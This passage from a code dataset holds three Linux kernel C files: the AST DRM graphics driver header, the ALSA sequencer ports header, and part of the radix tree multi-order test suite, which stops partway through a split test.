text
stringlengths
2
100k
meta
dict
/* * Copyright 2012 Red Hat Inc. * * Permission is hereby granted, free of charge, to any person obtaining a * copy of this software and associated documentation files (the * "Software"), to deal in the Software without restriction, including * without limitation the rights to use, copy, modify, merge, publish, * distribute, sub license, and/or sell copies of the Software, and to * permit persons to whom the Software is furnished to do so, subject to * the following conditions: * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL * THE COPYRIGHT HOLDERS, AUTHORS AND/OR ITS SUPPLIERS BE LIABLE FOR ANY CLAIM, * DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR * OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE * USE OR OTHER DEALINGS IN THE SOFTWARE. * * The above copyright notice and this permission notice (including the * next paragraph) shall be included in all copies or substantial portions * of the Software. 
* */ /* * Authors: Dave Airlie <airlied@redhat.com> */ #ifndef __AST_DRV_H__ #define __AST_DRV_H__ #include <drm/drm_encoder.h> #include <drm/drm_fb_helper.h> #include <drm/ttm/ttm_bo_api.h> #include <drm/ttm/ttm_bo_driver.h> #include <drm/ttm/ttm_placement.h> #include <drm/ttm/ttm_memory.h> #include <drm/ttm/ttm_module.h> #include <drm/drm_gem.h> #include <linux/i2c.h> #include <linux/i2c-algo-bit.h> #define DRIVER_AUTHOR "Dave Airlie" #define DRIVER_NAME "ast" #define DRIVER_DESC "AST" #define DRIVER_DATE "20120228" #define DRIVER_MAJOR 0 #define DRIVER_MINOR 1 #define DRIVER_PATCHLEVEL 0 #define PCI_CHIP_AST2000 0x2000 #define PCI_CHIP_AST2100 0x2010 #define PCI_CHIP_AST1180 0x1180 enum ast_chip { AST2000, AST2100, AST1100, AST2200, AST2150, AST2300, AST2400, AST2500, AST1180, }; enum ast_tx_chip { AST_TX_NONE, AST_TX_SIL164, AST_TX_ITE66121, AST_TX_DP501, }; #define AST_DRAM_512Mx16 0 #define AST_DRAM_1Gx16 1 #define AST_DRAM_512Mx32 2 #define AST_DRAM_1Gx32 3 #define AST_DRAM_2Gx16 6 #define AST_DRAM_4Gx16 7 #define AST_DRAM_8Gx16 8 struct ast_fbdev; struct ast_private { struct drm_device *dev; void __iomem *regs; void __iomem *ioregs; enum ast_chip chip; bool vga2_clone; uint32_t dram_bus_width; uint32_t dram_type; uint32_t mclk; uint32_t vram_size; struct ast_fbdev *fbdev; int fb_mtrr; struct { struct drm_global_reference mem_global_ref; struct ttm_bo_global_ref bo_global_ref; struct ttm_bo_device bdev; } ttm; struct drm_gem_object *cursor_cache; uint64_t cursor_cache_gpu_addr; /* Acces to this cache is protected by the crtc->mutex of the only crtc * we have. 
*/ struct ttm_bo_kmap_obj cache_kmap; int next_cursor; bool support_wide_screen; enum { ast_use_p2a, ast_use_dt, ast_use_defaults } config_mode; enum ast_tx_chip tx_chip_type; u8 dp501_maxclk; u8 *dp501_fw_addr; const struct firmware *dp501_fw; /* dp501 fw */ }; int ast_driver_load(struct drm_device *dev, unsigned long flags); void ast_driver_unload(struct drm_device *dev); struct ast_gem_object; #define AST_IO_AR_PORT_WRITE (0x40) #define AST_IO_MISC_PORT_WRITE (0x42) #define AST_IO_VGA_ENABLE_PORT (0x43) #define AST_IO_SEQ_PORT (0x44) #define AST_IO_DAC_INDEX_READ (0x47) #define AST_IO_DAC_INDEX_WRITE (0x48) #define AST_IO_DAC_DATA (0x49) #define AST_IO_GR_PORT (0x4E) #define AST_IO_CRTC_PORT (0x54) #define AST_IO_INPUT_STATUS1_READ (0x5A) #define AST_IO_MISC_PORT_READ (0x4C) #define AST_IO_MM_OFFSET (0x380) #define __ast_read(x) \ static inline u##x ast_read##x(struct ast_private *ast, u32 reg) { \ u##x val = 0;\ val = ioread##x(ast->regs + reg); \ return val;\ } __ast_read(8); __ast_read(16); __ast_read(32) #define __ast_io_read(x) \ static inline u##x ast_io_read##x(struct ast_private *ast, u32 reg) { \ u##x val = 0;\ val = ioread##x(ast->ioregs + reg); \ return val;\ } __ast_io_read(8); __ast_io_read(16); __ast_io_read(32); #define __ast_write(x) \ static inline void ast_write##x(struct ast_private *ast, u32 reg, u##x val) {\ iowrite##x(val, ast->regs + reg);\ } __ast_write(8); __ast_write(16); __ast_write(32); #define __ast_io_write(x) \ static inline void ast_io_write##x(struct ast_private *ast, u32 reg, u##x val) {\ iowrite##x(val, ast->ioregs + reg);\ } __ast_io_write(8); __ast_io_write(16); #undef __ast_io_write static inline void ast_set_index_reg(struct ast_private *ast, uint32_t base, uint8_t index, uint8_t val) { ast_io_write16(ast, base, ((u16)val << 8) | index); } void ast_set_index_reg_mask(struct ast_private *ast, uint32_t base, uint8_t index, uint8_t mask, uint8_t val); uint8_t ast_get_index_reg(struct ast_private *ast, uint32_t base, uint8_t 
index); uint8_t ast_get_index_reg_mask(struct ast_private *ast, uint32_t base, uint8_t index, uint8_t mask); static inline void ast_open_key(struct ast_private *ast) { ast_set_index_reg(ast, AST_IO_CRTC_PORT, 0x80, 0xA8); } #define AST_VIDMEM_SIZE_8M 0x00800000 #define AST_VIDMEM_SIZE_16M 0x01000000 #define AST_VIDMEM_SIZE_32M 0x02000000 #define AST_VIDMEM_SIZE_64M 0x04000000 #define AST_VIDMEM_SIZE_128M 0x08000000 #define AST_VIDMEM_DEFAULT_SIZE AST_VIDMEM_SIZE_8M #define AST_MAX_HWC_WIDTH 64 #define AST_MAX_HWC_HEIGHT 64 #define AST_HWC_SIZE (AST_MAX_HWC_WIDTH*AST_MAX_HWC_HEIGHT*2) #define AST_HWC_SIGNATURE_SIZE 32 #define AST_DEFAULT_HWC_NUM 2 /* define for signature structure */ #define AST_HWC_SIGNATURE_CHECKSUM 0x00 #define AST_HWC_SIGNATURE_SizeX 0x04 #define AST_HWC_SIGNATURE_SizeY 0x08 #define AST_HWC_SIGNATURE_X 0x0C #define AST_HWC_SIGNATURE_Y 0x10 #define AST_HWC_SIGNATURE_HOTSPOTX 0x14 #define AST_HWC_SIGNATURE_HOTSPOTY 0x18 struct ast_i2c_chan { struct i2c_adapter adapter; struct drm_device *dev; struct i2c_algo_bit_data bit; }; struct ast_connector { struct drm_connector base; struct ast_i2c_chan *i2c; }; struct ast_crtc { struct drm_crtc base; struct drm_gem_object *cursor_bo; uint64_t cursor_addr; int cursor_width, cursor_height; u8 offset_x, offset_y; }; struct ast_encoder { struct drm_encoder base; }; struct ast_framebuffer { struct drm_framebuffer base; struct drm_gem_object *obj; }; struct ast_fbdev { struct drm_fb_helper helper; struct ast_framebuffer afb; void *sysram; int size; struct ttm_bo_kmap_obj mapping; int x1, y1, x2, y2; /* dirty rect */ spinlock_t dirty_lock; }; #define to_ast_crtc(x) container_of(x, struct ast_crtc, base) #define to_ast_connector(x) container_of(x, struct ast_connector, base) #define to_ast_encoder(x) container_of(x, struct ast_encoder, base) #define to_ast_framebuffer(x) container_of(x, struct ast_framebuffer, base) struct ast_vbios_stdtable { u8 misc; u8 seq[4]; u8 crtc[25]; u8 ar[20]; u8 gr[9]; }; struct 
ast_vbios_enhtable { u32 ht; u32 hde; u32 hfp; u32 hsync; u32 vt; u32 vde; u32 vfp; u32 vsync; u32 dclk_index; u32 flags; u32 refresh_rate; u32 refresh_rate_index; u32 mode_id; }; struct ast_vbios_dclk_info { u8 param1; u8 param2; u8 param3; }; struct ast_vbios_mode_info { const struct ast_vbios_stdtable *std_table; const struct ast_vbios_enhtable *enh_table; }; extern int ast_mode_init(struct drm_device *dev); extern void ast_mode_fini(struct drm_device *dev); int ast_framebuffer_init(struct drm_device *dev, struct ast_framebuffer *ast_fb, const struct drm_mode_fb_cmd2 *mode_cmd, struct drm_gem_object *obj); int ast_fbdev_init(struct drm_device *dev); void ast_fbdev_fini(struct drm_device *dev); void ast_fbdev_set_suspend(struct drm_device *dev, int state); void ast_fbdev_set_base(struct ast_private *ast, unsigned long gpu_addr); struct ast_bo { struct ttm_buffer_object bo; struct ttm_placement placement; struct ttm_bo_kmap_obj kmap; struct drm_gem_object gem; struct ttm_place placements[3]; int pin_count; }; #define gem_to_ast_bo(gobj) container_of((gobj), struct ast_bo, gem) static inline struct ast_bo * ast_bo(struct ttm_buffer_object *bo) { return container_of(bo, struct ast_bo, bo); } #define to_ast_obj(x) container_of(x, struct ast_gem_object, base) #define AST_MM_ALIGN_SHIFT 4 #define AST_MM_ALIGN_MASK ((1 << AST_MM_ALIGN_SHIFT) - 1) extern int ast_dumb_create(struct drm_file *file, struct drm_device *dev, struct drm_mode_create_dumb *args); extern void ast_gem_free_object(struct drm_gem_object *obj); extern int ast_dumb_mmap_offset(struct drm_file *file, struct drm_device *dev, uint32_t handle, uint64_t *offset); #define DRM_FILE_PAGE_OFFSET (0x100000000ULL >> PAGE_SHIFT) int ast_mm_init(struct ast_private *ast); void ast_mm_fini(struct ast_private *ast); int ast_bo_create(struct drm_device *dev, int size, int align, uint32_t flags, struct ast_bo **pastbo); int ast_gem_create(struct drm_device *dev, u32 size, bool iskernel, struct drm_gem_object **obj); 
int ast_bo_pin(struct ast_bo *bo, u32 pl_flag, u64 *gpu_addr);
int ast_bo_unpin(struct ast_bo *bo);

/*
 * Lock (reserve) the underlying TTM buffer object, sleeping unless
 * @no_wait is set.  Returns 0 on success or the ttm_bo_reserve() error.
 * -ERESTARTSYS (interrupted) and -EBUSY (contended with no_wait) are
 * expected outcomes and deliberately not logged.
 */
static inline int ast_bo_reserve(struct ast_bo *bo, bool no_wait)
{
	int ret;

	ret = ttm_bo_reserve(&bo->bo, true, no_wait, NULL);
	if (ret) {
		if (ret != -ERESTARTSYS && ret != -EBUSY)
			DRM_ERROR("reserve failed %p\n", bo);
		return ret;
	}
	return 0;
}

/* Drop the reservation taken by ast_bo_reserve(). */
static inline void ast_bo_unreserve(struct ast_bo *bo)
{
	ttm_bo_unreserve(&bo->bo);
}

void ast_ttm_placement(struct ast_bo *bo, int domain);
int ast_bo_push_sysram(struct ast_bo *bo);
int ast_mmap(struct file *filp, struct vm_area_struct *vma);

/* ast post */
void ast_enable_vga(struct drm_device *dev);
void ast_enable_mmio(struct drm_device *dev);
bool ast_is_vga_enabled(struct drm_device *dev);
void ast_post_gpu(struct drm_device *dev);
u32 ast_mindwm(struct ast_private *ast, u32 r);
void ast_moutdwm(struct ast_private *ast, u32 r, u32 v);

/* ast dp501 */
void ast_set_dp501_video_output(struct drm_device *dev, u8 mode);
bool ast_backup_fw(struct drm_device *dev, u8 *addr, u32 size);
bool ast_dp501_read_edid(struct drm_device *dev, u8 *ediddata);
u8 ast_get_dp501_max_clk(struct drm_device *dev);
void ast_init_3rdtx(struct drm_device *dev);
void ast_release_firmware(struct drm_device *dev);
#endif
{ "language": "C" }
/*
 *   ALSA sequencer Ports
 *   Copyright (c) 1998 by Frank van de Pol <fvdpol@coil.demon.nl>
 *
 *
 *   This program is free software; you can redistribute it and/or modify
 *   it under the terms of the GNU General Public License as published by
 *   the Free Software Foundation; either version 2 of the License, or
 *   (at your option) any later version.
 *
 *   This program is distributed in the hope that it will be useful,
 *   but WITHOUT ANY WARRANTY; without even the implied warranty of
 *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *   GNU General Public License for more details.
 *
 *   You should have received a copy of the GNU General Public License
 *   along with this program; if not, write to the Free Software
 *   Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307 USA
 *
 */
#ifndef __SND_SEQ_PORTS_H
#define __SND_SEQ_PORTS_H

#include <sound/seq_kernel.h>
#include "seq_lock.h"

/* list of 'exported' ports */

/*
 * Client ports that are not exported are still accessible, but are
 * anonymous ports.
 *
 * If a port supports SUBSCRIPTION, that port can send events to all
 * subscribers to a special address, with address
 * (queue==SNDRV_SEQ_ADDRESS_SUBSCRIBERS).  The message is then sent to all
 * recipients that are registered in the subscription list.  A typical
 * application for these SUBSCRIPTION events is handling of incoming MIDI
 * data.  The port doesn't 'know' what other clients are interested in this
 * message.  If for instance a MIDI recording application would like to
 * receive the events from that port, it will first have to subscribe with
 * that port.
 */

/* One subscription linking a sender port to a destination port. */
struct snd_seq_subscribers {
	struct snd_seq_port_subscribe info;	/* additional info */
	struct list_head src_list;	/* link of sources */
	struct list_head dest_list;	/* link of destinations */
	atomic_t ref_count;
};

/* Per-direction subscription list attached to a client port. */
struct snd_seq_port_subs_info {
	struct list_head list_head;	/* list of subscribed ports */
	unsigned int count;		/* count of subscribers */
	unsigned int exclusive: 1;	/* exclusive mode */
	struct rw_semaphore list_mutex;
	rwlock_t list_lock;
	int (*open)(void *private_data, struct snd_seq_port_subscribe *info);
	int (*close)(void *private_data, struct snd_seq_port_subscribe *info);
};

/* A sequencer port owned by a client. */
struct snd_seq_client_port {

	struct snd_seq_addr addr;	/* client/port number */
	struct module *owner;		/* owner of this port */
	char name[64];			/* port name */
	struct list_head list;		/* port list */
	snd_use_lock_t use_lock;

	/* subscribers */
	struct snd_seq_port_subs_info c_src;	/* read (sender) list */
	struct snd_seq_port_subs_info c_dest;	/* write (dest) list */

	int (*event_input)(struct snd_seq_event *ev, int direct, void *private_data,
			   int atomic, int hop);
	void (*private_free)(void *private_data);
	void *private_data;
	unsigned int callback_all : 1;
	unsigned int closing : 1;
	unsigned int timestamping: 1;
	unsigned int time_real: 1;
	int time_queue;

	/* capability, inport, output, sync */
	unsigned int capability;	/* port capability bits */
	unsigned int type;		/* port type bits */

	/* supported channels */
	int midi_channels;
	int midi_voices;
	int synth_voices;
};

struct snd_seq_client;

/* return pointer to port structure and lock port */
struct snd_seq_client_port *snd_seq_port_use_ptr(struct snd_seq_client *client, int num);

/* search for next port - port is locked if found */
struct snd_seq_client_port *snd_seq_port_query_nearest(struct snd_seq_client *client,
						       struct snd_seq_port_info *pinfo);

/* unlock the port */
#define snd_seq_port_unlock(port) snd_use_lock_free(&(port)->use_lock)

/* create a port, port number is returned (-1 on failure) */
struct snd_seq_client_port *snd_seq_create_port(struct snd_seq_client *client,
						int port_index);

/* delete a port */
int snd_seq_delete_port(struct snd_seq_client *client, int port);

/* delete all ports */
int snd_seq_delete_all_ports(struct snd_seq_client *client);

/* set port info fields */
int snd_seq_set_port_info(struct snd_seq_client_port *port,
			  struct snd_seq_port_info *info);

/* get port info fields */
int snd_seq_get_port_info(struct snd_seq_client_port *port,
			  struct snd_seq_port_info *info);

/* add subscriber to subscription list */
int snd_seq_port_connect(struct snd_seq_client *caller,
			 struct snd_seq_client *s, struct snd_seq_client_port *sp,
			 struct snd_seq_client *d, struct snd_seq_client_port *dp,
			 struct snd_seq_port_subscribe *info);

/* remove subscriber from subscription list */
int snd_seq_port_disconnect(struct snd_seq_client *caller,
			    struct snd_seq_client *s, struct snd_seq_client_port *sp,
			    struct snd_seq_client *d, struct snd_seq_client_port *dp,
			    struct snd_seq_port_subscribe *info);

/* subscribe port */
int snd_seq_port_subscribe(struct snd_seq_client_port *port,
			   struct snd_seq_port_subscribe *info);

/* get matched subscriber */
struct snd_seq_subscribers *snd_seq_port_get_subscription(struct snd_seq_port_subs_info *src_grp,
							  struct snd_seq_addr *dest_addr);

#endif
{ "language": "C" }
/*
 * multiorder.c: Multi-order radix tree entry testing
 * Copyright (c) 2016 Intel Corporation
 * Author: Ross Zwisler <ross.zwisler@linux.intel.com>
 * Author: Matthew Wilcox <matthew.r.wilcox@intel.com>
 *
 * This program is free software; you can redistribute it and/or modify it
 * under the terms and conditions of the GNU General Public License,
 * version 2, as published by the Free Software Foundation.
 *
 * This program is distributed in the hope it will be useful, but WITHOUT
 * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
 * FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for
 * more details.
 */
#include <linux/radix-tree.h>
#include <linux/slab.h>
#include <linux/errno.h>

#include "test.h"

/* Iterate over every index covered by an order-@order entry at @base. */
#define for_each_index(i, base, order) \
	for (i = base; i < base + (1 << order); i++)

/*
 * Insert one multi-order entry and verify that tag set/get/clear operations
 * behave identically across every index the entry covers.
 */
static void __multiorder_tag_test(int index, int order)
{
	RADIX_TREE(tree, GFP_KERNEL);
	int base, err, i;

	/* our canonical entry */
	base = index & ~((1 << order) - 1);

	printv(2, "Multiorder tag test with index %d, canonical entry %d\n",
			index, base);

	err = item_insert_order(&tree, index, order);
	assert(!err);

	/*
	 * Verify we get collisions for covered indices.  We try and fail to
	 * insert an exceptional entry so we don't leak memory via
	 * item_insert_order().
	 */
	for_each_index(i, base, order) {
		err = __radix_tree_insert(&tree, i, order,
				(void *)(0xA0 | RADIX_TREE_EXCEPTIONAL_ENTRY));
		assert(err == -EEXIST);
	}

	/* No tags set yet anywhere in the covered range. */
	for_each_index(i, base, order) {
		assert(!radix_tree_tag_get(&tree, i, 0));
		assert(!radix_tree_tag_get(&tree, i, 1));
	}

	/* Tagging any covered index tags the whole entry. */
	assert(radix_tree_tag_set(&tree, index, 0));

	for_each_index(i, base, order) {
		assert(radix_tree_tag_get(&tree, i, 0));
		assert(!radix_tree_tag_get(&tree, i, 1));
	}

	/* Copy tag 0 -> tag 1, then clear tag 0; only tag 1 remains. */
	assert(tag_tagged_items(&tree, NULL, 0, ~0UL, 10, 0, 1) == 1);
	assert(radix_tree_tag_clear(&tree, index, 0));

	for_each_index(i, base, order) {
		assert(!radix_tree_tag_get(&tree, i, 0));
		assert(radix_tree_tag_get(&tree, i, 1));
	}

	assert(radix_tree_tag_clear(&tree, index, 1));

	assert(!radix_tree_tagged(&tree, 0));
	assert(!radix_tree_tagged(&tree, 1));

	item_kill_tree(&tree);
}

/*
 * Tag a multi-order entry plus a single-order entry and check that
 * tag_tagged_items() counts both exactly once.
 */
static void __multiorder_tag_test2(unsigned order, unsigned long index2)
{
	RADIX_TREE(tree, GFP_KERNEL);
	unsigned long index = (1 << order);
	index2 += index;

	assert(item_insert_order(&tree, 0, order) == 0);
	assert(item_insert(&tree, index2) == 0);

	assert(radix_tree_tag_set(&tree, 0, 0));
	assert(radix_tree_tag_set(&tree, index2, 0));

	assert(tag_tagged_items(&tree, NULL, 0, ~0UL, 10, 0, 1) == 2);

	item_kill_tree(&tree);
}

/* Drive the tag tests across a spread of orders and indices. */
static void multiorder_tag_tests(void)
{
	int i, j;

	/* test multi-order entry for indices 0-7 with no sibling pointers */
	__multiorder_tag_test(0, 3);
	__multiorder_tag_test(5, 3);

	/* test multi-order entry for indices 8-15 with no sibling pointers */
	__multiorder_tag_test(8, 3);
	__multiorder_tag_test(15, 3);

	/*
	 * Our order 5 entry covers indices 0-31 in a tree with height=2.
	 * This is broken up as follows:
	 * 0-7: canonical entry
	 * 8-15: sibling 1
	 * 16-23: sibling 2
	 * 24-31: sibling 3
	 */
	__multiorder_tag_test(0, 5);
	__multiorder_tag_test(29, 5);

	/* same test, but with indices 32-63 */
	__multiorder_tag_test(32, 5);
	__multiorder_tag_test(44, 5);

	/*
	 * Our order 8 entry covers indices 0-255 in a tree with height=3.
	 * This is broken up as follows:
	 * 0-63: canonical entry
	 * 64-127: sibling 1
	 * 128-191: sibling 2
	 * 192-255: sibling 3
	 */
	__multiorder_tag_test(0, 8);
	__multiorder_tag_test(190, 8);

	/* same test, but with indices 256-511 */
	__multiorder_tag_test(256, 8);
	__multiorder_tag_test(300, 8);

	__multiorder_tag_test(0x12345678UL, 8);

	for (i = 1; i < 10; i++)
		for (j = 0; j < (10 << i); j++)
			__multiorder_tag_test2(i, j);
}

/*
 * Insert a multi-order entry, verify it is visible at every covered index
 * and absent outside, then replace and delete it.
 */
static void multiorder_check(unsigned long index, int order)
{
	unsigned long i;
	unsigned long min = index & ~((1UL << order) - 1);
	unsigned long max = min + (1UL << order);
	void **slot;
	struct item *item2 = item_create(min, order);
	RADIX_TREE(tree, GFP_KERNEL);

	printv(2, "Multiorder index %ld, order %d\n", index, order);

	assert(item_insert_order(&tree, index, order) == 0);

	for (i = min; i < max; i++) {
		struct item *item = item_lookup(&tree, i);
		assert(item != 0);
		assert(item->index == index);
	}
	for (i = 0; i < min; i++)
		item_check_absent(&tree, i);
	for (i = max; i < 2*max; i++)
		item_check_absent(&tree, i);
	for (i = min; i < max; i++)
		assert(radix_tree_insert(&tree, i, item2) == -EEXIST);

	/* Replace the entry in place and confirm all covered indices see it. */
	slot = radix_tree_lookup_slot(&tree, index);
	free(*slot);
	radix_tree_replace_slot(&tree, slot, item2);
	for (i = min; i < max; i++) {
		struct item *item = item_lookup(&tree, i);
		assert(item != 0);
		assert(item->index == min);
	}

	assert(item_delete(&tree, min) != 0);

	for (i = 0; i < 2*max; i++)
		item_check_absent(&tree, i);
}

/*
 * Check that deleting a single-order entry next to a multi-order entry
 * shrinks the tree back to its previous root node.
 */
static void multiorder_shrink(unsigned long index, int order)
{
	unsigned long i;
	unsigned long max = 1 << order;
	RADIX_TREE(tree, GFP_KERNEL);
	struct radix_tree_node *node;

	printv(2, "Multiorder shrink index %ld, order %d\n", index, order);

	assert(item_insert_order(&tree, 0, order) == 0);

	node = tree.rnode;

	assert(item_insert(&tree, index) == 0);
	assert(node != tree.rnode);

	assert(item_delete(&tree, index) != 0);
	assert(node == tree.rnode);

	for (i = 0; i < max; i++) {
		struct item *item = item_lookup(&tree, i);
		assert(item != 0);
		assert(item->index == 0);
	}
	for (i = max; i < 2*max; i++)
		item_check_absent(&tree, i);

	if (!item_delete(&tree, 0)) {
		printv(2, "failed to delete index %ld (order %d)\n", index, order);
		abort();
	}

	for (i = 0; i < 2*max; i++)
		item_check_absent(&tree, i);
}

/* Regression test: tagged single entry followed by a multi-order insert. */
static void multiorder_insert_bug(void)
{
	RADIX_TREE(tree, GFP_KERNEL);

	item_insert(&tree, 0);
	radix_tree_tag_set(&tree, 0, 0);
	item_insert_order(&tree, 3 << 6, 6);

	item_kill_tree(&tree);
}

/* Iterate a tree of mixed-order entries from every possible start index. */
void multiorder_iteration(void)
{
	RADIX_TREE(tree, GFP_KERNEL);
	struct radix_tree_iter iter;
	void **slot;
	int i, j, err;

	printv(1, "Multiorder iteration test\n");

#define NUM_ENTRIES 11
	int index[NUM_ENTRIES] = {0, 2, 4, 8, 16, 32, 34, 36, 64, 72, 128};
	int order[NUM_ENTRIES] = {1, 1, 2, 3, 4, 1, 0, 1, 3, 0, 7};

	for (i = 0; i < NUM_ENTRIES; i++) {
		err = item_insert_order(&tree, index[i], order[i]);
		assert(!err);
	}

	for (j = 0; j < 256; j++) {
		/* Find the first entry whose covered range reaches index j. */
		for (i = 0; i < NUM_ENTRIES; i++)
			if (j <= (index[i] | ((1 << order[i]) - 1)))
				break;

		radix_tree_for_each_slot(slot, &tree, &iter, j) {
			int height = order[i] / RADIX_TREE_MAP_SHIFT;
			int shift = height * RADIX_TREE_MAP_SHIFT;
			unsigned long mask = (1UL << order[i]) - 1;
			struct item *item = *slot;

			assert((iter.index | mask) == (index[i] | mask));
			assert(iter.shift == shift);
			assert(!radix_tree_is_internal_node(item));
			assert((item->index | mask) == (index[i] | mask));
			assert(item->order == order[i]);
			i++;
		}
	}

	item_kill_tree(&tree);
}

/* Same as multiorder_iteration() but walking only tagged entries. */
void multiorder_tagged_iteration(void)
{
	RADIX_TREE(tree, GFP_KERNEL);
	struct radix_tree_iter iter;
	void **slot;
	int i, j;

	printv(1, "Multiorder tagged iteration test\n");

#define MT_NUM_ENTRIES 9
	int index[MT_NUM_ENTRIES] = {0, 2, 4, 16, 32, 40, 64, 72, 128};
	int order[MT_NUM_ENTRIES] = {1, 0, 2, 4, 3, 1, 3, 0, 7};

#define TAG_ENTRIES 7
	int tag_index[TAG_ENTRIES] = {0, 4, 16, 40, 64, 72, 128};

	for (i = 0; i < MT_NUM_ENTRIES; i++)
		assert(!item_insert_order(&tree, index[i], order[i]));

	assert(!radix_tree_tagged(&tree, 1));

	for (i = 0; i < TAG_ENTRIES; i++)
		assert(radix_tree_tag_set(&tree, tag_index[i], 1));

	for (j = 0; j < 256; j++) {
		int k;

		/* Find the first tagged entry whose range reaches index j. */
		for (i = 0; i < TAG_ENTRIES; i++) {
			for (k = i; index[k] < tag_index[i]; k++)
				;
			if (j <= (index[k] | ((1 << order[k]) - 1)))
				break;
		}

		radix_tree_for_each_tagged(slot, &tree, &iter, j, 1) {
			unsigned long mask;
			struct item *item = *slot;
			for (k = i; index[k] < tag_index[i]; k++)
				;
			mask = (1UL << order[k]) - 1;

			assert((iter.index | mask) == (tag_index[i] | mask));
			assert(!radix_tree_is_internal_node(item));
			assert((item->index | mask) == (tag_index[i] | mask));
			assert(item->order == order[k]);
			i++;
		}
	}

	/* Copy tag 1 -> tag 2 and repeat the walk on tag 2. */
	assert(tag_tagged_items(&tree, NULL, 0, ~0UL, TAG_ENTRIES, 1, 2) ==
				TAG_ENTRIES);

	for (j = 0; j < 256; j++) {
		int mask, k;

		for (i = 0; i < TAG_ENTRIES; i++) {
			for (k = i; index[k] < tag_index[i]; k++)
				;
			if (j <= (index[k] | ((1 << order[k]) - 1)))
				break;
		}

		radix_tree_for_each_tagged(slot, &tree, &iter, j, 2) {
			struct item *item = *slot;
			for (k = i; index[k] < tag_index[i]; k++)
				;
			mask = (1 << order[k]) - 1;

			assert((iter.index | mask) == (tag_index[i] | mask));
			assert(!radix_tree_is_internal_node(item));
			assert((item->index | mask) == (tag_index[i] | mask));
			assert(item->order == order[k]);
			i++;
		}
	}

	/* Copy tag 1 -> tag 0 starting from index 1; index 0 keeps its tag. */
	assert(tag_tagged_items(&tree, NULL, 1, ~0UL, MT_NUM_ENTRIES * 2, 1, 0)
			== TAG_ENTRIES);
	i = 0;
	radix_tree_for_each_tagged(slot, &tree, &iter, 0, 0) {
		assert(iter.index == tag_index[i]);
		i++;
	}

	item_kill_tree(&tree);
}

/*
 * Basic join checks: make sure we can't find an entry in the tree after
 * a larger entry has replaced it
 */
static void multiorder_join1(unsigned long index,
				unsigned order1, unsigned order2)
{
	unsigned long loc;
	void *item, *item2 = item_create(index + 1, order1);
	RADIX_TREE(tree, GFP_KERNEL);

	item_insert_order(&tree, index, order2);
	item = radix_tree_lookup(&tree, index);
	radix_tree_join(&tree, index + 1, order1, item2);
	/* The old item may have been dropped by the join; free it if so. */
	loc = find_item(&tree, item);
	if (loc == -1)
		free(item);
	item = radix_tree_lookup(&tree, index + 1);
	assert(item == item2);
	item_kill_tree(&tree);
}

/*
 * Check that the accounting of exceptional entries is handled correctly
 * by joining an exceptional entry to a normal pointer.
 */
static void multiorder_join2(unsigned order1, unsigned order2)
{
	RADIX_TREE(tree, GFP_KERNEL);
	struct radix_tree_node *node;
	void *item1 = item_create(0, order1);
	void *item2;

	item_insert_order(&tree, 0, order2);
	radix_tree_insert(&tree, 1 << order2, (void *)0x12UL);
	item2 = __radix_tree_lookup(&tree, 1 << order2, &node, NULL);
	assert(item2 == (void *)0x12UL);
	assert(node->exceptional == 1);

	item2 = radix_tree_lookup(&tree, 0);
	free(item2);

	radix_tree_join(&tree, 0, order1, item1);
	item2 = __radix_tree_lookup(&tree, 1 << order2, &node, NULL);
	assert(item2 == item1);
	assert(node->exceptional == 0);
	item_kill_tree(&tree);
}

/*
 * This test revealed an accounting bug for exceptional entries at one point.
 * Nodes were being freed back into the pool with an elevated exception count
 * by radix_tree_join() and then radix_tree_split() was failing to zero the
 * count of exceptional entries.
 */
static void multiorder_join3(unsigned int order)
{
	RADIX_TREE(tree, GFP_KERNEL);
	struct radix_tree_node *node;
	void **slot;
	struct radix_tree_iter iter;
	unsigned long i;

	for (i = 0; i < (1 << order); i++) {
		radix_tree_insert(&tree, i, (void *)0x12UL);
	}

	radix_tree_join(&tree, 0, order, (void *)0x16UL);
	rcu_barrier();

	radix_tree_split(&tree, 0, 0);

	radix_tree_for_each_slot(slot, &tree, &iter, 0) {
		radix_tree_iter_replace(&tree, &iter, slot, (void *)0x12UL);
	}

	__radix_tree_lookup(&tree, 0, &node, NULL);
	assert(node->exceptional == node->count);

	item_kill_tree(&tree);
}

/* Drive the join tests across a range of index/order combinations. */
static void multiorder_join(void)
{
	int i, j, idx;

	for (idx = 0; idx < 1024; idx = idx * 2 + 3) {
		for (i = 1; i < 15; i++) {
			for (j = 0; j < i; j++) {
				multiorder_join1(idx, i, j);
			}
		}
	}

	for (i = 1; i < 15; i++) {
		for (j = 0; j < i; j++) {
			multiorder_join2(i, j);
		}
	}

	for (i = 3; i < 10; i++) {
		multiorder_join3(i);
	}
}

/* Verify a split did not leave preloaded or excess nodes behind. */
static void check_mem(unsigned old_order, unsigned new_order, unsigned alloc)
{
	struct radix_tree_preload *rtp = &radix_tree_preloads;
	if (rtp->nr != 0)
		printv(2, "split(%u %u) remaining %u\n", old_order, new_order,
							rtp->nr);
	/*
	 * Can't check for equality here as some nodes may have been
	 * RCU-freed while we ran.  But we should never finish with more
	 * nodes allocated since they should have all been preloaded.
	 */
	if (nr_allocated > alloc)
		printv(2, "split(%u %u) allocated %u %u\n", old_order, new_order,
							alloc, nr_allocated);
}

/* Split an order-@old_order item into order-@new_order items; check memory. */
static void __multiorder_split(int old_order, int new_order)
{
	RADIX_TREE(tree, GFP_ATOMIC);
	void **slot;
	struct radix_tree_iter iter;
	unsigned alloc;
	struct item *item;

	radix_tree_preload(GFP_KERNEL);
	assert(item_insert_order(&tree, 0, old_order) == 0);
	radix_tree_preload_end();

	/* Wipe out the preloaded cache or it'll confuse check_mem() */
	radix_tree_cpu_dead(0);

	item = radix_tree_tag_set(&tree, 0, 2);

	radix_tree_split_preload(old_order, new_order, GFP_KERNEL);
	alloc = nr_allocated;
	radix_tree_split(&tree, 0, new_order);
	check_mem(old_order, new_order, alloc);
